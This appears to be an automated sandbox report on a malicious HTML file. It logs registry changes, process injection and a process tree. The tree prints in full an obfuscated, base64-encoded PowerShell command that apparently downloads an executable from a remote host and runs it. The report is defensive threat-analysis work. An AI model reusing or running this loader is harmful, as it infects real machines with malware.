135436cf2735f3fb5642711e7077e2642d4ce8d17aa1c7bbefaf44c938961db6

Analysis

max time kernel
122s
max time network
132s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
29/01/2024, 08:25

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

7f5b73f875f7eb6444f724e8c5ebcb04.html
Size

7KB
MD5

7f5b73f875f7eb6444f724e8c5ebcb04
SHA1

70c183f3ee12c220d39d64ec5b77ad65b05e93c4
SHA256

135436cf2735f3fb5642711e7077e2642d4ce8d17aa1c7bbefaf44c938961db6
SHA512

85814eaadf2ba1cf78ab5e66633f13b3a4748c0100b94c98ec127342c3fa25b33975bb72c8c069717554fc82bb15f67eaaab9bef38315f9e88c6fff38d0d80c0
SSDEEP

96:Sq0d/+6/WXE+sUaEZBPB/IhCmaOgcHn7r+UBmbg3mdrmY:SB/D/NXUaoO+UBmbg3g5

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 1 IoCs

flow	pid	Process
12	1792	powershell.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "412678588"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{EFE534E1-BE7F-11EE-A83A-5E688C03EF37} = "0"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000580e1c8c6faee54b80ab28599b83677c000000000200000000001066000000010000200000007962d2eb38e84b77aa7c23332387bdf734765e8d53eec0daf2b7f36420305f20000000000e8000000002000020000000bb359a06823867c2783465ac29097e48af9e8651196db232775063b7219a578920000000101d69b614e9940865fe6b94c24dcf0eabae9d46da2b859a0e91810a4e23138e40000000743f509e20cd7b0ff86045cb9bc00f718a4e3458c61d9de2a40373bae9bce4243d6381edc8ea73240d992e974054346acb69b129e8c304df9f214caa2cec71e3	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = e0f0c2c48c52da01	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000580e1c8c6faee54b80ab28599b83677c00000000020000000000106600000001000020000000cd9a24a25ef7d0739fc560472edcf957587dce652b015bb3ccee2a1f2ac1ac36000000000e8000000002000020000000026536e569efac137910bd02507c811de5121beb78d47ac7fc87da66de6be1d090000000432709f13b4de27a7bd4db69868757513f2a3e7e04153b7e218703ff1e6f9d24eec71bd2d8274bcd95fd9a8598289e039523a768f03c72f22f243df3c75124ff7b69853dd69241cd7455abdea664cf6ef3c94cff52573484a5533ba4108485aca6fe30b1d836fcda7ffd5e758721db539edbf24e08f31820a457b7267c3d2318e19e346bd23b3e17476f78971c436212400000001b259ffed233b7ed8dc99ca999ec835b626109ba72ae8c22fd6612c6bfeeaa6f40b8e93b6d71d2f1e948c5ae467420b2bb95f372582b38906a2a91f523a3fb00	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-928733405-3780110381-2966456290-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
2208	pOWERSheLl.EXe
1792	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	2208	pOWERSheLl.EXe
Token: SeDebugPrivilege	1792	powershell.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2300	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2300	iexplore.exe
2300	iexplore.exe
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE
2648	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 12 IoCs

description	pid	Process	procid_target
PID 2300 wrote to memory of 2648	2300	iexplore.exe	28
PID 2300 wrote to memory of 2648	2300	iexplore.exe	28
PID 2300 wrote to memory of 2648	2300	iexplore.exe	28
PID 2300 wrote to memory of 2648	2300	iexplore.exe	28
PID 2648 wrote to memory of 2208	2648	IEXPLORE.EXE	29
PID 2648 wrote to memory of 2208	2648	IEXPLORE.EXE	29
PID 2648 wrote to memory of 2208	2648	IEXPLORE.EXE	29
PID 2648 wrote to memory of 2208	2648	IEXPLORE.EXE	29
PID 2208 wrote to memory of 1792	2208	pOWERSheLl.EXe	31
PID 2208 wrote to memory of 1792	2208	pOWERSheLl.EXe	31
PID 2208 wrote to memory of 1792	2208	pOWERSheLl.EXe	31
PID 2208 wrote to memory of 1792	2208	pOWERSheLl.EXe	31

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\7f5b73f875f7eb6444f724e8c5ebcb04.html
1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2300
- C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
  "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2300 CREDAT:275457 /prefetch:2
  2⤵
  - Modifies Internet Explorer settings
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2648
- - C:\Windows\SysWOW64\WinDowSpOWeRshELL\V1.0\pOWERSheLl.EXe
    "C:\Windows\SySteM32\WinDowSpOWeRshELL\V1.0\pOWERSheLl.EXe" pOWerShELl.Exe -EX bypaSs -noP -w 1 -ec CQAgAAkAcwBFAFQALQBDAG8ATgB0AGUATgB0AAkAIAAJAC0AVgBhACAAIAAgACgACQAgACAAJgAoAGcAYwBNACAATgBFAFcALQBPAEIASgBlAEMAKgApACAACQAgACgAIAAJAAkAWwBDAEgAYQBSAF0ACQAgAAkAMABYADQARQAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAcgBdAAkAIAAJADAAWAA2ADUACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABhAFIAXQAJACAACQAwAHgANQA0AAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAYQByAF0ACQAgAAkAMAB4ADIARQAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAUgBdAAkAIAAJADAAWAA3ADcACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABBAHIAXQAJACAACQAwAFgANAA1AAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAEgAYQByAF0ACQAgAAkAMABYADQAMgAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAcgBdAAkAIAAJADAAeAA2ADMACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABhAFIAXQAJACAACQAwAHgANABDAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAQQBSAF0ACQAgAAkAMABYADQAOQAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAUgBdAAkAIAAJADAAWAA2ADUACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQAwAHgANABFAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAYQBSAF0ACQAgAAkAMABYADcANAAJACAACQAJAAkAIAApACkALgAoAAkACQAJAFsAQwBoAEEAcgBdAAkAIAAgADAAeAA0ADQACQAgACAACQAgACAAKwAJACAAIABbAGMAaABhAFIAXQAJACAAIAAwAFgANABGAAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAYQByAF0ACQAgACAAMAB4ADcANwAJACAAIAAJACAAIAArAAkAIAAgAFsAYwBoAEEAUgBdAAkAIAAgADAAeAA0AEUACQAgACAACQAgACAAKwAJACAAIABbAEMAaABhAHIAXQAJACAAIAAwAHgANgBDAAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAQQBSAF0ACQAgACAAMABYADQARgAJACAAIAAJACAAIAArAAkAIAAgAFsAQwBIAGEAUgBdAAkAIAAgADAAWAA2ADEACQAgACAACQAgACAAKwAJACAAIABbAEMAaABBAHIAXQAJACAAIAAwAFgANAA0AAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAQQBSAF0ACQAgACAAMABYADQANAAJACAAIAAJACAAIAArAAkAIAAgAFsAQwBIAGEAcgBdAAkAIAAgADAAWAA0ADEACQAgACAACQAgACAAKwAJACAAIABbAGMAaABBAHIAXQAJACAAIAAwAHgANwA0AAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAQQByAF0ACQAgACAAMABYADYAMQAJACAAIAAgACAAIAApAC4AaQBOAFYATwBLAGUAKAAgAAkAIAAoAFsAQwBoAGEAUgBdACAACQAJADAAeAA2ADgAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMASABhAFIAXQAgAAkACQAwAHgANwA0ACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAYQBSAF0AIAAJAAkAMABYADcANAAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAcgBdACAACQAJADAAWAA3ADAAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMAaABhAFIAXQAgAAkACQAwAHgAMwBBACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAQQByAF0AIAAJAAkAMAB4ADIARgAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAeAAyAEYAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMAaABhAHIAXQAgAAkACQAwAHgAMwAxACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAQQByAF0AIAAJAAkAMABYADMAOQAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAUgBdACAACQAJADAAWAAzADgAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABBAHIAXQAgAAkACQAwAHgAMgBFACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAYQBSAF0AIAAJAAkAMABYADMAMgAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAUgBdACAACQAJADAAeAAzADMAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMAaABBAHIAXQAgAAkACQAwAHgAMgBFACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAYQBSAF0AIAAJAAkAMAB4ADMAMgAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAeAAzADEAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMAaABBAFIAXQAgAAkACQAwAFgAMwAyACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAQQBSAF0AIAAJAAkAMAB4ADIARQAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAeAAzADEAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMAaABBAHIAXQAgAAkACQAwAFgAMwAzACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAQQByAF0AIAAJAAkAMABYADMANwAgAAkACQAgAAkACQArACAACQAJAFsAYwBoAEEAcgBdACAACQAJADAAeAAyAEYAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMAaABhAHIAXQAgAAkACQAwAFgANwAzACAACQAJACAACQAJACsAIAAJAAkAWwBjAGgAQQByAF0AIAAJAAkAMAB4ADcANwAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAUgBdACAACQAJADAAWAA2ADkAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMASABhAHIAXQAgAAkACQAwAHgANwAzACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAQQByAF0AIAAJAAkAMAB4ADcAMwAgAAkACQAgAAkACQArACAACQAJAFsAQwBoAEEAcgBdACAACQAJADAAWAAyAEYAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABhAHIAXQAgAAkACQAwAFgANwAzACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAYQByAF0AIAAJAAkAMAB4ADcANwAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAWAA3ADMAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMASABhAHIAXQAgAAkACQAwAFgAMgBGACAACQAJACAACQAJACsAIAAJAAkAWwBDAEgAYQByAF0AIAAJAAkAMAB4ADcANgAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAEEAUgBdACAACQAJADAAWAA2ADIAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABhAFIAXQAgAAkACQAwAFgANgAzACAACQAJACAACQAJACsAIAAJAAkAWwBDAEgAQQByAF0AIAAJAAkAMABYADIARQAgAAkACQAgAAkACQArACAACQAJAFsAYwBoAGEAcgBdACAACQAJADAAeAA2ADUAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABBAFIAXQAgAAkACQAwAFgANwA4ACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAYQBSAF0AIAAJAAkAMABYADYANQAgAAkACQApACAAIAAJACkAIAAgAAkALQBFAG4AIAAJAAkAKAAJAAkACQBbAEMASABBAHIAXQAJAAkAIAAwAHgANgAyAAkACQAgAAkACQAgACsACQAJACAAWwBjAEgAQQBSAF0ACQAJACAAMABYADUAOQAJAAkAIAAJAAkAIAArAAkACQAgAFsAQwBoAGEAcgBdAAkACQAgADAAeAA3ADQACQAJACAACQAJACAAKwAJAAkAIABbAEMASABhAFIAXQAJAAkAIAAwAFgANAA1AAkACQAgAAkAIAAJACkAIAAgAAkALQBQAEEAdABIACAACQAgAB0gJABFAE4AdgA6AFAAdQBiAEwASQBDAFwAdgBiAGMALgBlAHgAZQAdICAAIAAgADsAIAAJAAkAcwB0AGEAUgB0ACAAIAAgAB0gJABlAE4AdgA6AFAAdQBCAGwASQBjAFwAdgBiAGMALgBlAHgAZQAdIA==
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2208
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bypaSs -noP -w 1 -ec CQAgAAkAcwBFAFQALQBDAG8ATgB0AGUATgB0AAkAIAAJAC0AVgBhACAAIAAgACgACQAgACAAJgAoAGcAYwBNACAATgBFAFcALQBPAEIASgBlAEMAKgApACAACQAgACgAIAAJAAkAWwBDAEgAYQBSAF0ACQAgAAkAMABYADQARQAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAcgBdAAkAIAAJADAAWAA2ADUACQAgAAkACQAgAAkAKwAJACAACQBbAEMASABhAFIAXQAJACAACQAwAHgANQA0AAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAGgAYQByAF0ACQAgAAkAMAB4ADIARQAJACAACQAJACAACQArAAkAIAAJAFsAYwBoAEEAUgBdAAkAIAAJADAAWAA3ADcACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABBAHIAXQAJACAACQAwAFgANAA1AAkAIAAJAAkAIAAJACsACQAgAAkAWwBDAEgAYQByAF0ACQAgAAkAMABYADQAMgAJACAACQAJACAACQArAAkAIAAJAFsAQwBoAEEAcgBdAAkAIAAJADAAeAA2ADMACQAgAAkACQAgAAkAKwAJACAACQBbAEMAaABhAFIAXQAJACAACQAwAHgANABDAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAQQBSAF0ACQAgAAkAMABYADQAOQAJACAACQAJACAACQArAAkAIAAJAFsAQwBIAGEAUgBdAAkAIAAJADAAWAA2ADUACQAgAAkACQAgAAkAKwAJACAACQBbAGMASABhAHIAXQAJACAACQAwAHgANABFAAkAIAAJAAkAIAAJACsACQAgAAkAWwBjAEgAYQBSAF0ACQAgAAkAMABYADcANAAJACAACQAJAAkAIAApACkALgAoAAkACQAJAFsAQwBoAEEAcgBdAAkAIAAgADAAeAA0ADQACQAgACAACQAgACAAKwAJACAAIABbAGMAaABhAFIAXQAJACAAIAAwAFgANABGAAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAYQByAF0ACQAgACAAMAB4ADcANwAJACAAIAAJACAAIAArAAkAIAAgAFsAYwBoAEEAUgBdAAkAIAAgADAAeAA0AEUACQAgACAACQAgACAAKwAJACAAIABbAEMAaABhAHIAXQAJACAAIAAwAHgANgBDAAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAQQBSAF0ACQAgACAAMABYADQARgAJACAAIAAJACAAIAArAAkAIAAgAFsAQwBIAGEAUgBdAAkAIAAgADAAWAA2ADEACQAgACAACQAgACAAKwAJACAAIABbAEMAaABBAHIAXQAJACAAIAAwAFgANAA0AAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAQQBSAF0ACQAgACAAMABYADQANAAJACAAIAAJACAAIAArAAkAIAAgAFsAQwBIAGEAcgBdAAkAIAAgADAAWAA0ADEACQAgACAACQAgACAAKwAJACAAIABbAGMAaABBAHIAXQAJACAAIAAwAHgANwA0AAkAIAAgAAkAIAAgACsACQAgACAAWwBjAEgAQQByAF0ACQAgACAAMABYADYAMQAJACAAIAAgACAAIAApAC4AaQBOAFYATwBLAGUAKAAgAAkAIAAoAFsAQwBoAGEAUgBdACAACQAJADAAeAA2ADgAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMASABhAFIAXQAgAAkACQAwAHgANwA0ACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAYQBSAF0AIAAJAAkAMABYADcANAAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAcgBdACAACQAJADAAWAA3ADAAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMAaABhAFIAXQAgAAkACQAwAHgAMwBBACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAQQByAF0AIAAJAAkAMAB4ADIARgAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAeAAyAEYAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMAaABhAHIAXQAgAAkACQAwAHgAMwAxACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAQQByAF0AIAAJAAkAMABYADMAOQAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAUgBdACAACQAJADAAWAAzADgAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABBAHIAXQAgAAkACQAwAHgAMgBFACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAYQBSAF0AIAAJAAkAMABYADMAMgAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAUgBdACAACQAJADAAeAAzADMAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMAaABBAHIAXQAgAAkACQAwAHgAMgBFACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAYQBSAF0AIAAJAAkAMAB4ADMAMgAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAeAAzADEAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMAaABBAFIAXQAgAAkACQAwAFgAMwAyACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAQQBSAF0AIAAJAAkAMAB4ADIARQAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAeAAzADEAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMAaABBAHIAXQAgAAkACQAwAFgAMwAzACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAQQByAF0AIAAJAAkAMABYADMANwAgAAkACQAgAAkACQArACAACQAJAFsAYwBoAEEAcgBdACAACQAJADAAeAAyAEYAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMAaABhAHIAXQAgAAkACQAwAFgANwAzACAACQAJACAACQAJACsAIAAJAAkAWwBjAGgAQQByAF0AIAAJAAkAMAB4ADcANwAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAGEAUgBdACAACQAJADAAWAA2ADkAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMASABhAHIAXQAgAAkACQAwAHgANwAzACAACQAJACAACQAJACsAIAAJAAkAWwBDAGgAQQByAF0AIAAJAAkAMAB4ADcAMwAgAAkACQAgAAkACQArACAACQAJAFsAQwBoAEEAcgBdACAACQAJADAAWAAyAEYAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABhAHIAXQAgAAkACQAwAFgANwAzACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAYQByAF0AIAAJAAkAMAB4ADcANwAgAAkACQAgAAkACQArACAACQAJAFsAYwBIAGEAcgBdACAACQAJADAAWAA3ADMAIAAJAAkAIAAJAAkAKwAgAAkACQBbAGMASABhAHIAXQAgAAkACQAwAFgAMgBGACAACQAJACAACQAJACsAIAAJAAkAWwBDAEgAYQByAF0AIAAJAAkAMAB4ADcANgAgAAkACQAgAAkACQArACAACQAJAFsAQwBIAEEAUgBdACAACQAJADAAWAA2ADIAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABhAFIAXQAgAAkACQAwAFgANgAzACAACQAJACAACQAJACsAIAAJAAkAWwBDAEgAQQByAF0AIAAJAAkAMABYADIARQAgAAkACQAgAAkACQArACAACQAJAFsAYwBoAGEAcgBdACAACQAJADAAeAA2ADUAIAAJAAkAIAAJAAkAKwAgAAkACQBbAEMASABBAFIAXQAgAAkACQAwAFgANwA4ACAACQAJACAACQAJACsAIAAJAAkAWwBjAEgAYQBSAF0AIAAJAAkAMABYADYANQAgAAkACQApACAAIAAJACkAIAAgAAkALQBFAG4AIAAJAAkAKAAJAAkACQBbAEMASABBAHIAXQAJAAkAIAAwAHgANgAyAAkACQAgAAkACQAgACsACQAJACAAWwBjAEgAQQBSAF0ACQAJACAAMABYADUAOQAJAAkAIAAJAAkAIAArAAkACQAgAFsAQwBoAGEAcgBdAAkACQAgADAAeAA3ADQACQAJACAACQAJACAAKwAJAAkAIABbAEMASABhAFIAXQAJAAkAIAAwAFgANAA1AAkACQAgAAkAIAAJACkAIAAgAAkALQBQAEEAdABIACAACQAgAB0gJABFAE4AdgA6AFAAdQBiAEwASQBDAFwAdgBiAGMALgBlAHgAZQAdICAAIAAgADsAIAAJAAkAcwB0AGEAUgB0ACAAIAAgAB0gJABlAE4AdgA6AFAAdQBCAGwASQBjAFwAdgBiAGMALgBlAHgAZQAdIA==
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1792

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
732fa1a2d03d6313333e1387bd0c4455

SHA1
0467e860a91d71043f8a969068d5d567b741989f

SHA256
78ee2d4ed2a69d5b053e47ee3c66d040e46060cd5ed8bfa2688b2334ae69dd5d

SHA512
45d4c6c9bbd8682bebdc98fd6b0c9ef4d913f2634fa305f62d08de6668d56599a49e418dfa7ff370c3b3d7e0ada99d499c268a2eb0e2612af6ed9545d22094fa

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
df8ec9576e6b8e1c8e0ad12687a06b39

SHA1
1974361c6023620ef550f7a3a55085f4cc70ce54

SHA256
d99c9c38a2a9a94f2045b30d196011ad9324be9e96d2f2ee05efc257d55d0dc4

SHA512
36008edc84c067302c70a51914f8118adbe9f79a5e10b33011840d6c183f15b8f471578457f3690a21c45a4516a761d213a47253e78671cdce68071f176387d3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
9f7c751741b2adc5a7c423e276605e1f

SHA1
e38347d0e02069a577d79ee3c1b31e5d756fdaee

SHA256
e4cfec87e827bf14b5cb220bc9dd6ecde39f3a529f11d0c462e0fa11f46b6fc1

SHA512
95744c23fec0066b3862ccc5cd9e9c2716cc83a5906847f33427efcc70b453756e5ef7bf3154d59776915b928476eede9935787e8c227df1749cd96ce786b9ab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
30062447c0f064e2f4445cb7313c2eb9

SHA1
2411f6b0daa08d9e44b22d388c9b1007ca6d1fba

SHA256
65f0477ae3331843df3b496f51368d0c3bd73813e3c3e71ea15d4d40da8db426

